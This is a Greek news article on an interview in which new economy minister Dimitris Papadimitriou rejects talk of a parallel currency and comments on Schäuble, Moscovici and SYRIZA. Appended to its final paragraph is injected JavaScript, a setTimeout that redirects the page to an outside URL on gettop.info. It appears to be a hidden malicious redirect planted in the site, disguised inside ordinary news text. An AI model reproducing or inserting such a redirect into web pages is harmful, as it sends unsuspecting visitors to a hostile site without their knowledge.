Παπαδημητρίου: Παραπλανητική η συζήτηση για παράλληλο νόμισμα τώρα

0
5

 

Παραπλανητική χαρακτήρισε τη συζήτηση για το παράλληλο νόμισμα ο νέος υπουργός Οικονομίας και Ανάπτυξης, Δημήτρης Παπαδημητρίου, σε συνέντευξή του την ΕΡΤ, επισημαίνοντας ότι η κυβέρνηση έχει απορρίψει το ενδεχόμενο αυτό.

Ο κ. Παπαδημητρίου είπε πως δεν είναι κατανοητή η κινδυνολογία από την αντιπολίτευση για τη συμμετοχή του στην κυβέρνηση. Υποστήριξε ότι «είναι διαφορετικό πράγμα να μιλάς ως ακαδημαϊκός οπότε μπορεί να είσαι και… ανεύθυνος και διαφορετικό να μιλάς ως πολιτικός».

Πρόσθεσε επιπλέον ότι «δεν είναι ρεαλιστικό να συζητείται το θέμα του παράλληλου νομίσματος τώρα. Ίσως είχε κάποιο νόημα το 2012, αλλά όχι τώρα, καθώς υπάρχουν δείκτες σταθεροποίησης της ελληνικής οικονομίας».

«Πολλοί είπαν το αντίθετο από αυτό που είπε ο κ. Σόιμπλε (για συζήτηση για το χρέος μετά το τέλος του προγράμματος). Όλοι ξέρουν ότι ο κ. Σόιμπλε το είπε γιατί έχουν εκλογές το 2017 στη Γερμανία. Δεν μπορεί να βγει από την παγίδα που έχει χτίσει», επεσήμανε ο νέος υπουργός Οικονομίας: «Αυτό που λέει ο κ. Μοσκοβισί είναι ότι πρέπει να κλείσει η αξιολόγηση. Αυτό λέμε και εμείς, δεν λέμε κάτι διαφορετικό», τόνισε με φόντο το Eurogroup της Δευτέρας.

«Νομίζω ότι μπορώ να προσφέρω, θα μας δώσει τη δυνατότητα αυτό που νομίζω να επιστρέψουμε στην ανάπτυξη. Αυτό που με γοήτευσε στον ΣΥΡΙΖΑ ήταν το κοινωνικό του πρόγραμμα. Ήξερε ότι το πρόγραμμα της λιτότητας δεν θα οδηγούσε σε ανάπτυξη», είπε ο κ. Παπαδημητρίου.

Ο νέος υπουργός Οικονομίας τόνισε πως «δυστυχώς όταν ο ΣΥΡΙΖΑ έγινε κυβέρνηση κατάλαβε ότι οι κανόνες της Ευρωζώνης είναι διαφορετικοί και για να αναπτυχθεί η χώρα πρέπει να πας με τους κανόνες της Ευρώπης».

«Η κυβέρνηση του ΣΥΡΙΖΑ προσπαθεί να καταπολεμήσει τη διαφθορά. Κάτι που δεν είχαμε ακούσει ποτέ από τις προηγούμενες κυβερνήσεις», κατέληξε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here